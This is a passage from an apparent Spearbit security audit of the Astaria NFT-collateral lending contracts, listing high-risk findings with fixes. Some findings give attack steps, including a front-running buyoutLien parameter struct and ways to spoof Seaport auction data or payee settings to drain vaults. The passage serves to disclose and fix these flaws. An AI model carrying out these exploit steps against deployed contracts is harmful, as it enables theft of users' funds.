  $L'_i$        : params.encumber.lien.details.liquidationInitialAsk
  $I_{min}$     : AstariaRouter.s.minInterestBPS
  $D_{min}$     : AstariaRouter.s.minDurationIncrease
  $t_{now}$     : block.timestamp
  $b_i$         : buyout
  $o$           : _getOwed(params.encumber.stack[params.position], block.timestamp)
  $o_j$         : _getOwed(params.encumber.stack[j], params.encumber.stack[j].point.end)
  $n$           : params.encumber.stack.length
  $O = o_0 + o_1 + \cdots + o_{n-1}$ : _getMaxPotentialDebtForCollateral(params.encumber.stack)
  $s_j$         : params.encumber.stack[j]
  $s'_i$        : newStack

Let's go over the checks and modifications that buyoutLien does:
1. validateStack is called to make sure that the hash of params.encumber.stack matches the s.collateralStateHash value of $c$. This is not important and can be bypassed by the exploit even after the fix for Issue 106.
2. _createLien is called next, which does the following checks:
2.1. $c$ is not up for auction.
2.2. We haven't reached the max number of liens, currently set to 5.
2.3. $L'_i > 0$ and $L'_i \ge A'_i$.
2.4. If params.encumber.stack is not empty, then $c'_i = c$.
2.5. We _mint a new lien for $R$ with id equal to $h(N'_i, V'_i, S'_i, c'_i, (A'^{max}_i, r'_i, D'_i, P'_i, L'_i))$, where $h$ is the hashing mechanism of encoding and then taking the keccak256.
2.6. The new stack slot and the new lien id are returned.
3. isValidRefinance is called, which performs the following checks:
3.1. checks $c'_i = c$.
3.2. checks either $(r'_i < r_i - I_{min}) \land (e'_i \ge e_i)$ or $(r'_i \le r_i) \land (e'_i \ge e_i + D_{min})$.
4. check whether $c'_i$ is in auction by checking s.collateralStateHash's value.
5. check $O \le P'_i$.
6. check $A'^{max}_i \ge o$.
7. send wETH through TRANSFER_PROXY from msg.sender to the payee of $l_i$ with the amount of $b_i$.
8. if the payee of $l_i$ is a public vault, do some bookkeeping by calling handleBuyoutLien.
9. call _replaceStackAtPositionWithNewLien to:
9.1. replace $s_i$ with $s'_i$ in params.encumber.stack.
9.2. _burn $l_i$.
9.3. delete s.lienMeta of $l_i$.
So in a nutshell the important checks are:
• $c$, $c_i$ are not in auction (not important for the exploit)
• $n$ is less than or equal to the max number of allowed liens (5 currently) (not important for the exploit)
• $c'_i = c$
• $L'_i > 0$ and $L'_i \ge A'_i$
• $O \le P'_i$
• $A'^{max}_i \ge o$
• $(r'_i < r_i - I_{min}) \land (e'_i \ge e_i)$ or $(r'_i \le r_i) \land (e'_i \ge e_i + D_{min})$
Exploit
An attacker can DoS VaultImplementation.buyoutLien as follows:
1. A vault decides to buy out a collateral's lien to offer better terms and so signs a commitment, and someone on behalf of the vault calls VaultImplementation.buyoutLien which, if executed, would call LienToken.buyoutLien with the following parameters:

  LienActionBuyout({
    incoming: incomingTerms,
    position: position,
    encumber: ILienToken.LienActionEncumber({
      collateralId: collateralId,
      amount: incomingTerms.lienRequest.amount,
      receiver: recipient(),
      lien: ROUTER().validateCommitment({
        commitment: incomingTerms,
        timeToSecondEpochEnd: _timeToSecondEndIfPublic()
      }),
      stack: stack
    })
  })

2. The attacker front-runs the call from step 1 and instead provides the following modified parameters to LienToken.buyoutLien:

  LienActionBuyout({
    // not important, since it is not used and can be zeroed-out to save tx gas
    incoming: incomingTerms,
    position: position,
    encumber: ILienToken.LienActionEncumber({
      collateralId: collateralId,
      amount: incomingTerms.lienRequest.amount,
      receiver: msg.sender, // address of the attacker
      // note that the lien here would have the same fields as the original message by the vault rep.
      lien: ILienToken.Lien({
        token: address(s.WETH),
        vault: incomingTerms.lienRequest.strategy.vault, // address of the vault offering a better term
        strategyRoot: incomingTerms.lienRequest.merkle.root,
        collateralId: collateralId,
        details: details // see below
      }),
      stack: stack
    })
  })

where the details provided by the attacker can be calculated by using the below snippet:

  uint8 nlrType = uint8(_sliceUint(commitment.lienRequest.nlrDetails, 0));
  (bytes32 leaf, ILienToken.Details memory details) = IStrategyValidator(
    s.strategyValidators[nlrType]
  ).validateAndParse(
    commitment.lienRequest,
    s.COLLATERAL_TOKEN.ownerOf(
      commitment.tokenContract.computeId(commitment.tokenId)
    ),
    commitment.tokenContract,
    commitment.tokenId
  );

The result is that:
• The newLienId that was supposed to be _minted for the recipient() of the vault gets minted for the attacker.
• The call to VaultImplementation.buyoutLien would fail, since the newLienId is already minted, and so the vault would not be able to receive the interest it had anticipated.
• When there is a payment or Seaport auction settlement, the attacker would receive the funds instead.
• The attacker can introduce a malicious contract into the protocol that would be LienToken.ownerOf(newLienId), without needing to register a vault.
To execute this attack, the attacker would need to spend the buyout amount of assets. Also, the attacker does not necessarily need to front-run a transaction to buy out a lien. They can pick their own hand-crafted parameters that satisfy the conditions in the analysis above to introduce themselves into the protocol.
Recommendation: There are multiple ways to mitigate this issue.
1. We can restrict the LienToken.buyoutLien endpoint to be callable only by the vaults registered in AstariaRouter (a minimal sketch follows below).
2. In LienToken.buyoutLien, use params.incoming to validate the signatures and lien details.
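To illustrate mitigation 1, a minimal sketch of such a guard. The router's isValidVault view is referenced elsewhere in this review; the modifier and error name here are hypothetical, not the Astaria implementation:

  // Hypothetical guard: only vaults registered through AstariaRouter may call.
  modifier onlyRegisteredVault() {
    // isValidVault is assumed to return true only for registered vaults
    if (!ROUTER().isValidVault(msg.sender)) {
      revert InvalidSender();
    }
    _;
  }

  function buyoutLien(ILienToken.LienActionBuyout calldata params)
    external
    onlyRegisteredVault
    returns (Stack[] memory newStack, Stack memory newLien)
  { ... }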
The above 2 solutions would prevent an attacker from introducing/minting a new lien id using parameters from a different vault without themselves registering a vault.
Spearbit: This is resolved in the following commit by restricting the buyoutLien of the LienToken to only valid/registered vaults: commit 24da50.
+5.2.3 VaultImplementation.buyoutLien does not update the new public vault's parameters and does not transfer assets between the vault and the borrower
Severity: High Risk
Context:
• VaultImplementation.sol#L305
• LienToken.sol#L102
• LienToken.sol#L116
• LienToken.sol#L165-L174
Description: VaultImplementation.buyoutLien does not update the accounting for the vault (if it's public). The slope, yIntercept, and s.epochData[...].liensOpenForEpoch (for the new lien's end epoch) are not updated. They are updated for the payee of the swapped-out lien, if the payee is a public vault, by calling handleBuyoutLien. Also, the buyout amount is paid out by the vault itself. The difference between the new lien amount and the buyout amount is not worked out between the msg.sender and the new vault.
Recommendation:
1. If the vault whose VaultImplementation.buyoutLien endpoint was called into is a public vault, make sure to update its slope, yIntercept, and s.epochData[...].liensOpenForEpoch (for the new lien's end epoch) when the new lien is created.
2. The difference between the new lien amount and the buyout amount is not worked out between the msg.sender that called VaultImplementation.buyoutLien and the vault. If the buyout amount is higher than the new lien amount, we need to make sure the msg.sender also transfers some assets (wETH) to the vault. And the other way around: if the new lien amount is higher than the buyout amount, the vault needs to transfer some assets (wETH) to the borrower / msg.sender.
+5.2.4 setPayee doesn't update y intercept or slope, allowing vault owner to steal all funds
Severity: High Risk
Context:
• LienToken.sol#L868-878
• LienToken.sol#L165-173
Description: When setPayee() is called, the payment for the lien is no longer expected to go to the vault. However, this change doesn't impact the vault's y-intercept or slope, which are used to calculate the vault's totalAssets(). This can be used maliciously by a vault owner to artificially increase their totalAssets() to any arbitrary amount:
• Create a lien from the vault.
• setPayee to a non-vault address.
• Buy out the lien from another vault (this will cause the other vault's y-intercept and slope to increase, but will not impact the y-intercept and slope of the original vault, because it'll fail the check on L165 that the payee is a public vault).
• Repeat the process again going the other way, and repeat the full cycle until both vaults have the desired totalAssets().
For an existing vault, a vault owner can withdraw a small amount of assets each epoch. If, in any epoch, they are one of the only users withdrawing funds, they can perform this attack immediately before the epoch is processed. The result is that the withdrawal shares will be multiplied by totalAssets() / totalShares() to get the withdrawal rate, which can be made artificially high enough to wipe out the entire vault.
Recommendation: Adjust the y-intercept and slope of the old payee and the new payee immediately upon the payee being set.
Astaria: We're thinking of removing the ability for the owner to change the payee altogether.
There's no clear benefit to having this in the first place, since the payee would have no guarantees on receiving funds given that we reset the payee on LienToken transfers. We can just lock setPayee() to only be callable by a WithdrawProxy (if it needs auction funds), which is the primary use case anyway.
Spearbit: Confirmed, removing the setPayee function in the following PR PR 205 solves the issue.
+5.2.5 settleAuction() doesn't check if the auction was successful
Severity: High Risk
Context: CollateralToken.sol#L600
Description: settleAuction() is a privileged functionality called by LienToken.payDebtViaClearingHouse(). settleAuction() is intended to be called on a successful auction, but it doesn't verify that that's indeed the case. Anyone can create a fake Seaport order with one of its considerations set as the CollateralToken, as described in Issue 93. Another potential issue is that if Seaport orders can be "Restricted" in the future, then there is a possibility for an authorized entity to force settleAuction on CollateralToken, and when Seaport tries to call back on the zone to validate, it would fail.
Recommendation: The following validations can be performed:
• CollateralToken doesn't own the underlying NFT.
• collateralIdToAuction[collateralId] is active.
Now, settleAuction() can only be called on the success of a Seaport auction created by the Astaria protocol.
+5.2.6 Incorrect auction end validation in liquidatorNFTClaim()
Severity: High Risk
Context: CollateralToken.sol#L119
Description: liquidatorNFTClaim() does the following check to recognize that the Seaport auction has ended:

  if (block.timestamp < params.endTime) {
    //auction hasn't ended yet
    revert InvalidCollateralState(InvalidCollateralStates.AUCTION_ACTIVE);
  }

Here, params is completely controlled by users and hence, to bypass this check, the caller can set params.endTime to be less than block.timestamp. Thus, a possible exploit scenario occurs when AstariaRouter.liquidate() is called to list the underlying asset on Seaport, which also sets the liquidator address. Then, anyone can call liquidatorNFTClaim() to transfer the underlying asset to the liquidator by setting params.endTime < block.timestamp.
Recommendation: The parameter passed to liquidatorNFTClaim() should be validated against the parameters created for the Seaport auction. To do that:
• The collateralIdToAuction mapping, which currently maps collateralId to a boolean value indicating an active auction, should instead map from collateralId to the Seaport order hash.
• All usages of collateralIdToAuction should be updated. For example, isValidOrder() and isValidOrderIncludingExtraData() should be updated:

    return
  -   s.collateralIdToAuction[uint256(zoneHash)]
  +   s.collateralIdToAuction[uint256(zoneHash)] == orderHash
        ? ZoneInterface.isValidOrder.selector
        : bytes4(0xffffffff);

• liquidatorNFTClaim() should verify that the hash of params matches the value stored in the collateralIdToAuction mapping. This validates that params.endTime is not spoofed.
Astaria: Fixed in PR 210.
Spearbit: Verified.
+5.2.7 Typed structured data hash used for signing commitments is calculated incorrectly
Severity: High Risk
Context:
• VaultImplementation.sol#L150-L151
• VaultImplementation.sol#L172-L176
• IVaultImplementation.sol#L41
Description: Since

  STRATEGY_TYPEHASH == keccak256("StrategyDetails(uint256 nonce,uint256 deadline,bytes32 root)")

the hash calculated in _encodeStrategyData is incorrect according to EIP-712: s.strategistNonce is of type uint32, while the nonce type used in the typehash is uint256.
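For reference, a minimal sketch of consistent EIP-712 struct hashing (the _hashStrategy helper is hypothetical, shown only to illustrate the rule that the types in the type string must match the types the signer believes they are signing):

  bytes32 constant STRATEGY_TYPEHASH =
    keccak256("StrategyDetails(uint32 nonce,uint256 deadline,bytes32 root)");

  function _hashStrategy(
    uint32 nonce, // uint32, matching s.strategistNonce
    uint256 deadline,
    bytes32 root
  ) internal pure returns (bytes32) {
    // abi.encode pads the uint32 to 32 bytes either way; what differs is the
    // type string above, which EIP-712 signers (e.g. wallets) hash verbatim,
    // so a type mismatch makes the on-chain digest diverge from the signed one.
    return keccak256(abi.encode(STRATEGY_TYPEHASH, nonce, deadline, root));
  }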
Also, the struct name used in the typehash collides with the StrategyDetails struct name defined as:

  struct StrategyDetails {
    uint8 version;
    uint256 deadline;
    address vault;
  }

Recommendation: We suggest the following:
1. Update the STRATEGY_TYPEHASH to reflect the correct type uint32 for the nonce.
2. Keep the STRATEGY_TYPEHASH using the non-inlined version below, since the compiler would inline the value:

  bytes32 public constant STRATEGY_TYPEHASH =
    keccak256("StrategyDetails(uint32 nonce,uint256 deadline,bytes32 root)");

3. To avoid the name collision between the two structs, rename one of the StrategyDetails (even though one is not defined directly).
+5.2.8 makePayment doesn't properly update stack, so most payments don't pay off debt
Severity: High Risk
Context: LienToken.sol#615-635
Description: As we loop through individual payments in _makePayment, each is called with:

  (newStack, spent) = _payment(
    s,
    stack,
    uint8(i),
    totalCapitalAvailable,
    address(msg.sender)
  );

This call returns the updated stack as newStack but then uses the function argument stack again in the next iteration of the loop. The newStack value is unused until the final iteration, when it is passed along to _updateCollateralStateHash(). This means that the new state hash will be the original state with only the final loan repaid, even though all other loans have actually had payments made against them.
Recommendation:

    uint256 n = stack.length;
  + newStack = stack;
    for (uint256 i; i < n; ) {
      (newStack, spent) = _payment(
        s,
  -     stack,
  +     newStack,
        uint8(i),
        totalCapitalAvailable,
        address(msg.sender)
      );

This fixes the issue above, but the solution must also take into account the fix for the loop within _payment outlined in Issue 134. If you follow the suggestion in that issue, then this function should return an extra value (elementRemoved) and use that to dictate whether the loop iterates forward or remains at the same i for the next run. The final result should look like:

  function _makePayment(
    LienStorage storage s,
    Stack[] calldata stack,
    uint256 totalCapitalAvailable
  ) internal returns (Stack[] memory newStack, uint256 spent) {
    newStack = stack;
    bool elementRemoved = false;
    for (uint256 i; i < newStack.length; ) {
      (newStack, spent, elementRemoved) = _payment(
        s,
        newStack,
        uint8(i),
        totalCapitalAvailable,
        address(msg.sender)
      );
      totalCapitalAvailable -= spent;
      // if the stack is updated, we need to stay at the current index
      // to process the new element at the same index.
      if (!elementRemoved) {
        unchecked {
          ++i;
        }
      }
    }
    _updateCollateralStateHash(s, stack[0].lien.collateralId, newStack);
  }

Astaria: Checked if newStack changed length instead of returning an elementRemoved bool, because of a stack-too-deep error.
+5.2.9 _removeStackPosition() always reverts
Severity: High Risk
Context: LienToken.sol#L823-L828
Description: _removeStackPosition() always reverts since it indexes the stack array beyond its length:

  for (i; i < length; ) {
    unchecked {
      newStack[i] = stack[i + 1];
      ++i;
    }
  }

Notice that for i == length-1, stack[length] is accessed. This reverts since length is the length of the stack array. Additionally, the intention is to delete the element from stack at index position and shift left the elements appearing after this index. However, an additional increment of the loop index i results in newStack[position] being empty, and the shift of the other elements doesn't happen.
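To make the off-by-one concrete, a standalone sketch of the shift with the corrected bound (a hypothetical helper, simplified to uint256[]; not the Astaria code):

  // Removes the element at `position` by shifting the tail left by one.
  function removeAt(uint256[] memory stack, uint256 position)
    internal
    pure
    returns (uint256[] memory newStack)
  {
    uint256 length = stack.length;
    newStack = new uint256[](length - 1);
    uint256 i;
    for (; i < position; ) {
      newStack[i] = stack[i];
      unchecked { ++i; }
    }
    // The bound must be length - 1: reading stack[i + 1] at i == length - 1
    // would access stack[length] and revert -- unchecked only disables
    // arithmetic overflow checks, not array bounds checks.
    for (; i < length - 1; ) {
      newStack[i] = stack[i + 1];
      unchecked { ++i; }
    }
  }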
Recommendation: Apply this diff to LienToken.sol#L823-L831:

  - unchecked {
  -   ++i;
  - }
  - for (i; i < length; ) {
  + for (i; i < length - 1; ) {
      unchecked {
        newStack[i] = stack[i + 1];
        ++i;
      }
    }

Note: This issue has to be considered in conjunction with the following issue:
• makePayment doesn't properly update stack, so most payments don't pay off debt
Astaria: Fixed in PRs 202 and 265.
Spearbit: Verified.
+5.2.10 Refactor _paymentAH()
Severity: High Risk
Context: LienToken.sol#L571
Description: _paymentAH() has several vulnerabilities:
• stack is a memory parameter, so all the updates made to stack are not applied back to the corresponding storage variable.
• No need to update stack[position], as it's deleted later.
• decreaseEpochLienCount() is always passed 0, as stack[position] is already deleted. Also, decreaseEpochLienCount() expects an epoch, but end is passed instead.
• This if/else block can be merged. updateAfterLiquidationPayment() expects msg.sender to be LIEN_TOKEN, so this should work.
Recommendation: Apply this diff:

    function _paymentAH(
      LienStorage storage s,
      uint256 collateralId,
  -   AuctionStack[] memory stack,
  +   AuctionStack[] storage stack,
      uint256 position,
      uint256 payment,
      address payer
    ) internal returns (uint256) {
      uint256 lienId = stack[position].lienId;
      uint256 end = stack[position].end;
      uint256 owing = stack[position].amountOwed;
      //checks the lien exists
      address owner = ownerOf(lienId);
      address payee = _getPayee(s, lienId);
  -   if (owing > payment.safeCastTo88()) {
  -     stack[position].amountOwed -= payment.safeCastTo88();
  -   } else {
      if (owing < payment.safeCastTo88()) {
        payment = owing;
      }
      s.TRANSFER_PROXY.tokenTransferFrom(s.WETH, payer, payee, payment);
      delete s.lienMeta[lienId]; //full delete
      delete stack[position];
      _burn(lienId);
      if (_isPublicVault(s, payee)) {
  -     if (owner == payee) {
        IPublicVault(payee).updateAfterLiquidationPayment(
          IPublicVault.LiquidationPaymentParams({lienEnd: end})
        );
  -     } else {
  -       IPublicVault(payee).decreaseEpochLienCount(stack[position].end);
  -     }
      }
      emit Payment(lienId, payment);
      return payment;
    }

Also note other issues related to _paymentAH():
• Avoid shadowing variables
• Comment or remove unused function parameters
Astaria: Fixed in PR 201.
Spearbit: Verified.
+5.2.11 processEpoch() needs to be called regularly
Severity: High Risk
Context:
• PublicVault.sol#L247
• PublicVault.sol#L320
Description: If the processEpoch() endpoint does not get called regularly (especially close to the epoch boundaries), the updated currentEpoch will lag behind the actual expected value, and this will introduce arithmetic errors in formulas regarding epochs and timestamps.
Recommendation: Public vaults need a mechanism so that processEpoch() gets called regularly, for example using relayers or off-chain bots. Also, if there are any outstanding withdraw reserves, the vault (and/or the current withdraw proxy) needs to be topped up with assets so that the full amount of withdraw reserves can be transferred to the withdraw proxy from the epoch before, using transferWithdrawReserve; otherwise, the processing of the epoch would be halted. And if this halt continues for more than one epoch length, inaccuracy in the epoch number will be introduced into the system. Another mechanism that can be introduced into the system is incrementing the current epoch not just by one, but by an amount depending on the time passed since the last call to processEpoch() or the timestamp of the current epoch (see the sketch below).
Astaria: Acknowledged.
Spearbit: Acknowledged.
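A minimal sketch of the catch-up mechanism mentioned in the recommendation above (s.lastEpochProcessed, EPOCH_LENGTH() and EpochNotOver are assumed/placeholder names, not the Astaria implementation):

  // Advance currentEpoch by however many whole epochs have elapsed,
  // instead of assuming processEpoch() is called exactly once per epoch.
  uint256 elapsed = block.timestamp - s.lastEpochProcessed;
  uint256 epochsPassed = elapsed / EPOCH_LENGTH();
  if (epochsPassed == 0) revert EpochNotOver();
  s.currentEpoch += uint64(epochsPassed);
  s.lastEpochProcessed += epochsPassed * EPOCH_LENGTH();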
+5.2.12 Can create lien for collateral while at auction by passing spoofed data
Severity: High Risk
Context: LienToken.sol#L368-372
Description: In the createLien function, we check that the collateral isn't currently at auction before giving a lien, with the following check:

  if (
    s.collateralStateHash[params.collateralId] == bytes32("ACTIVE_AUCTION")
  ) {
    revert InvalidState(InvalidStates.COLLATERAL_AUCTION);
  }

However, collateralId is passed in multiple places in the params: both in params directly and in params.encumber.lien. The params.encumber.lien.collateralId is used everywhere else and is the final value that is used, but the check is performed on params.collateralId. As a result, we can set the following:
• params.encumber.lien.collateralId: collateral that is at auction.
• params.collateralId: collateral not at auction.
This will allow us to pass this validation while using the collateral at auction for the lien.
Recommendation:

    if (
  -   s.collateralStateHash[params.collateralId] == bytes32("ACTIVE_AUCTION")
  +   s.collateralStateHash[params.encumber.lien.collateralId] == bytes32("ACTIVE_AUCTION")
    ) {
      revert InvalidState(InvalidStates.COLLATERAL_AUCTION);
    }

Astaria: We can remove collateralId entirely from the encumber call as it's inside lien; the fix is to update to use lien.collateralId everywhere vs encumber.collateralId.
Spearbit: Agreed, that seems like the best fix and gets rid of an unneeded parameter. Confirmed the following PR 214 resolves the issue.
+5.2.13 stateHash isn't updated by buyoutLien function
Severity: High Risk
Context: LienToken.sol#L102-187
Description: We never update the collateral state hash anywhere in the buyoutLien function. As a result, once all checks are passed, payment will be transferred from the buyer to the seller, but the seller will retain ownership of the lien in the system's state.
Recommendation: We should save the return value of the _replaceStackAtPositionWithNewLien function call and use it to call:

  s.collateralStateHash[collateralId] = keccak256(abi.encode(newUpdatedStack));

Spearbit: Confirmed, the following commit fixes this issue.
+5.2.14 If a collateral's liquidation auction on Seaport ends without a winning bid, the call to liquidatorNFTClaim does not clear the related data on LienToken's side and also for payees that are public vaults
Severity: High Risk
Context: CollateralToken.sol#L107
Description: If/when a liquidation auction ends without being fulfilled/matched on Seaport and, afterward, the current liquidator calls into liquidatorNFTClaim, the storage data (s.collateralStateHash, s.auctionData, s.lienMeta) on the LienToken side don't get reset/cleared and the lien token does not get burnt. That means:
• s.collateralStateHash[collateralId] stays equal to bytes32("ACTIVE_AUCTION").
• s.auctionData[collateralId] will have the past auction data.
• s.lienMeta[collateralId].atLiquidation will be true.
That means future calls to commitToLiens by holders of the same collateral will revert.
Recommendation: Make sure to clear the related storage data on LienToken's side, and for payees that are public vaults, when liquidatorNFTClaim is called.
+5.2.15 ClearingHouse cannot detect if a call from Seaport comes from a genuine listing or auction
Severity: High Risk
Context: ClearingHouse.sol#L21
Description: Anyone can create a Seaport order with one of the considerations' recipients set to a ClearingHouse with a collateralId that is genuinely already set for auction.
Once the spoofed order settles, Seaport calls into this fallback function and causes the genuine Astaria auction to settle. This allows an attacker to set random items on sale on Seaport with funds directed here (small buying prices) to settle genuine Astaria auctions on the protocol. This causes:
• The Astaria auction payees and the liquidator would not receive what they would expect to come from the auction. And if the payee is a public vault, it would introduce incorrect parameters into its system.
• Lien data (s.lienMeta[lid]) and the lien token get deleted/burnt.
• Collateral token and data get burnt/deleted.
• When the actual genuine auction settles and calls back to here, it will revert due to the s.collateralIdToAuction[collateralId] check.
Recommendation: Astaria needs to introduce a mechanism so that Seaport would send more data to ClearingHouse to check the genuineness of the fallback calls.
Astaria: In a change yet to be merged, we have the ClearingHouse set up with checks to enforce that it has received enough of a payment in the right asset to complete the txn. We ultimately do not care where the txn came from as long as we are indeed offering the payment and are getting everything that the auction should cost. Will mark it as acknowledged and tag this ticket with the updates when merged.
Spearbit: Acknowledged.
+5.2.16 c.lienRequest.strategy.vault is not checked to be a registered vault when commitToLiens is called
Severity: High Risk
Context: AstariaRouter.sol#L680-L683
Description: From when commitToLiens is called until we end up calling IVaultImplementation(c.lienRequest.strategy.vault).commitToLien( ... ), the value of c.lienRequest.strategy.vault is not checked as to whether it is a registered vault within the system (by checking s.vaults). The caller can set this value to any address they desire and potentially perform some unwanted actions. For example, the user could spoof all the values in the commitments so that the later dependent contracts' checks are skipped, and lastly we end up transferring funds:

  s.TRANSFER_PROXY.tokenTransferFrom(
    address(s.WETH),
    address(this), // <--- AstariaRouter
    address(msg.sender),
    totalBorrowed
  );

Note that since all checks are skipped, the caller can also indirectly set totalBorrowed to any value they desire. And so, if AstariaRouter were to hold any wETH at any point in time, anyone could craft a payload to commitToLiens to drain its wETH balance.
Recommendation: Check that the value of s.vaults[c.lienRequest.strategy.vault] is not address(0) before calling c.lienRequest.strategy.vault's commitToLien endpoint.
Astaria: Solved in PR 197.
Spearbit: Verified.
+5.2.17 Anyone can take a loan out on behalf of any collateral holder at any terms
Severity: High Risk
Context: VaultImplementation.sol#L225
Description: In the _validateCommitment() function, the initial checks are intended to ensure that the caller who is requesting the lien is someone who should have access to the collateral that it's being taken out against. The caller also inputs a receiver, who will be receiving the lien. In this validation, this receiver is checked against the collateral holder, and the validation is approved in the case that receiver == holder. However, this does not imply that the collateral holder wants to take this loan. This opens the door to a malicious lender pushing unwanted loans on holders of collateral by calling commitToLien with their collateralId, as well as their address set as the receiver.
This will pass the receiver == holder check and execute the loan. In the best case, the borrower discovers this and quickly repays the loan, incurring a fee and a small amount of interest. In the worst case, the borrower doesn't know this happened, and their collateral is liquidated.
Recommendation: Only allow calls from the holder or operator to lead to valid commitments:

    address holder = CT.ownerOf(collateralId);
    address operator = CT.getApproved(collateralId);
    if (
      msg.sender != holder &&
  -   receiver != holder &&
  -   receiver != operator &&
  -   !ROUTER().isValidVault(receiver)
  +   msg.sender != operator &&
  +   !CT.isApprovedForAll(holder, msg.sender)
    ) {
  -   if (operator != address(0)) {
  -     require(operator == receiver);
  -   } else {
  -     require(CT.isApprovedForAll(holder, receiver));
  -   }
  +   revert NotApprovedForBorrow();
    }

+5.2.18 Strategist Interest Rewards will be 10x higher than expected due to incorrect divisor
Severity: High Risk
Context: PublicVault.sol#L564
Description: VAULT_FEE is set as an immutable argument in the construction of new vaults and is intended to be set in basis points. However, when the strategist interest rewards are calculated in _handleStrategistInterestReward(), the VAULT_FEE is only divided by 1000. The result is that the fee calculated by the function will be 10x higher than expected, and the strategist will be dramatically overpaid.
Recommendation:

    unchecked {
  -   uint256 fee = x.mulDivDown(VAULT_FEE(), 1000);
  +   uint256 fee = x.mulDivDown(VAULT_FEE(), 10000);
      s.strategistUnclaimedShares += convertToShares(fee).safeCastTo88();
    }

Astaria: Resolved based on the following PR 203.
Spearbit: Verified.
+5.2.19 The lower bound for liquidationInitialAsk for new liens needs to be stricter
Severity: High Risk
Context:
• LienToken.sol#L376-L381
• AstariaRouter.sol#L516
Description: params.lien.details.liquidationInitialAsk ($L_{new}$) is only compared to params.amount ($A_{new}$), whereas in _appendStack newStack[j].lien.details.liquidationInitialAsk ($L_j$) is compared to potentialDebt. potentialDebt is the aggregated sum of all potential owed amounts at the end of each position/lien. So in _appendStack we have:

  $o_{new} + o_{n-1} + \cdots + o_j \le L_j$

where $o_j$ is _getOwed(newStack[j], newStack[j].point.end), which is the amount for the stack slot plus the potential interest at the end of its term. So it would make sense to enforce a stricter inequality for $L_{new}$:

  $\left(1 + \frac{r\,(t_{end} - t_{now})}{10^{18}}\right) A_{new} = o_{new} \le L_{new}$

The big issue regarding the current lower bound arises when the borrower takes only one lien and, for this lien, liquidationInitialAsk == amount (or they are close). Then at any point during the lien term (maybe very close to the end), the borrower can atomically self-liquidate and settle the Seaport auction in one transaction. This way the borrower can skip paying any interest (they would need to pay OpenSea fees and potentially royalty fees) and, on top of that, they would receive liquidation fees.
Recommendation: Make sure the following stricter lower bound is used instead:

  $\left(1 + \frac{r\,(t_{end} - t_{now})}{10^{18}}\right) A_{new} = o_{new} \le L_{new}$

+5.2.20 commitToLiens transfers extra assets to the borrower when protocol fee is present
Severity: High Risk
Context:
• AstariaRouter.sol#L417-L422
• VaultImplementation.sol#L392
Description: totalBorrowed is the sum of all commitments[i].lienRequest.amount. But if s.feeTo is set, some of the funds/assets from the vaults get transferred to s.feeTo when _handleProtocolFee is called, and only the remainder is sent to the ROUTER().
So in this scenario, the total amount of assets sent to ROUTER() (so that it can be transferred to msg.sender) is, up to rounding errors:

  $\left(1 - \frac{n_p}{d_p}\right) T$

where:
• $T$ is the totalBorrowed
• $n_p$ is s.protocolFeeNumerator
• $d_p$ is s.protocolFeeDenominator
But we are transferring $T$ to msg.sender, which is more than we are supposed to send.
Recommendation: Make sure only $\left(1 - \frac{n_p}{d_p}\right) T$ is transferred to the borrower.
Astaria: Acknowledged.
Spearbit: Acknowledged.
+5.2.21 Withdraw proxy's claim() endpoint updates public vault's yIntercept incorrectly.
Severity: High Risk
Context:
• WithdrawProxy.sol#L235-L261
• WithdrawProxy.sol#L239
Description: Let

  $y_0$     : the yIntercept of the public vault in question.
  $n$       : the current epoch for the public vault.
  $E_{n-1}$ : the expected storage parameter of the previous withdraw proxy.
  $B_{n-1}$ : the asset balance of the previous withdraw proxy.
  $W_{n-1}$ : the withdrawReserveReceived of the previous withdraw proxy.
  $S_{n-1}$ : the total supply of the previous withdraw proxy.
  $S_v$     : the total supply of the public vault when processEpoch() was last called on the public vault.
  $B_v$     : the total balance of the public vault when processEpoch() was last called on the public vault.
  $V$       : the public vault.
  $P_{n-1}$ : the previous withdraw proxy.

Then $y_0$ is updated/decremented according to the formula (up to rounding errors due to division):

  $y_0 = y_0 - \max\left(0,\; E_{n-1} - (B_{n-1} - W_{n-1})\right)\left(1 - \frac{S_{n-1}}{S_v}\right)$

whereas the amount $A$ of assets transferred from $P_{n-1}$ to $V$ is

  $A = (B_{n-1} - W_{n-1})\left(1 - \frac{S_{n-1}}{S_v}\right)$

and the amount $B$ of assets left in $P_{n-1}$ after this transfer would be:

  $B = W_{n-1} + (B_{n-1} - W_{n-1})\,\frac{S_{n-1}}{S_v}$

$B_{n-1} - W_{n-1}$ is supposed to represent the payment the withdraw proxy receives from Seaport auctions, plus the amount of assets transferred to it by external actors. So $A$ represents the portion of this amount for users who have not withdrawn from the public vault in the previous epoch, and it is transferred to $V$, so $y_0$ should be compensated positively. Also note that this amount might be bigger than $E_{n-1}$ if a lien has a really high liquidationInitialAsk and its auction fulfills/matches near that price on Seaport. So it is possible that $E_{n-1} < A$. The current formula for updating $y_0$ has the following flaws:
• It only considers updating $y_0$ when $E_{n-1} - (B_{n-1} - W_{n-1}) > 0$, which is not always the case.
• It decrements $y_0$ by a portion of $E_{n-1}$.
The correct updating formula for $y_0$ should be:

  $y_0 = y_0 - E_{n-1} + (B_{n-1} - W_{n-1})\left(1 - \frac{S_{n-1}}{S_v}\right)$

Also note, if we let $B_{n-1} - W_{n-1} = X_{n-1} + \epsilon$, where $X_{n-1}$ is the payment received by the withdraw proxy from Seaport auction payments and $\epsilon$ (if $W_{n-1}$ is updated correctly) is the assets received from external actors by the previous withdraw proxy, then:

  $B = W_{n-1} + (X_{n-1} + \epsilon)\,\frac{S_{n-1}}{S_v} = \left[\max(0,\; B_v - E_{n-1}) + X_{n-1} + \epsilon\right]\frac{S_{n-1}}{S_v}$

The last equality comes from the fact that, when the withdraw reserves are fully transferred from the public vault and the current withdraw proxy (if necessary) to the previous withdraw proxy, the amount $W_{n-1}$ would hold should be $\max(0,\; B_v - E_{n-1})\,\frac{S_{n-1}}{S_v}$. Related Issue.
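A worked example with hypothetical numbers shows both flaws at once. Take $E_{n-1} = 100$, $B_{n-1} = 150$, $W_{n-1} = 30$ and $\frac{S_{n-1}}{S_v} = \frac{1}{4}$. Then $B_{n-1} - W_{n-1} = 120 > E_{n-1}$, so the current code computes $\max(0,\; 100 - 120)\left(1 - \frac{1}{4}\right) = 0$ and leaves $y_0$ unchanged, while the correct update is $y_0 - E_{n-1} + 120 \cdot \frac{3}{4} = y_0 - 10$; the vault's totalAssets() therefore overstates its holdings by 10.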
Recommendation: Make sure $y_0$ is updated in claim() according to the following formula:

  $y_0 = y_0 - E_{n-1} + (B_{n-1} - W_{n-1})\left(1 - \frac{S_{n-1}}{S_v}\right)$

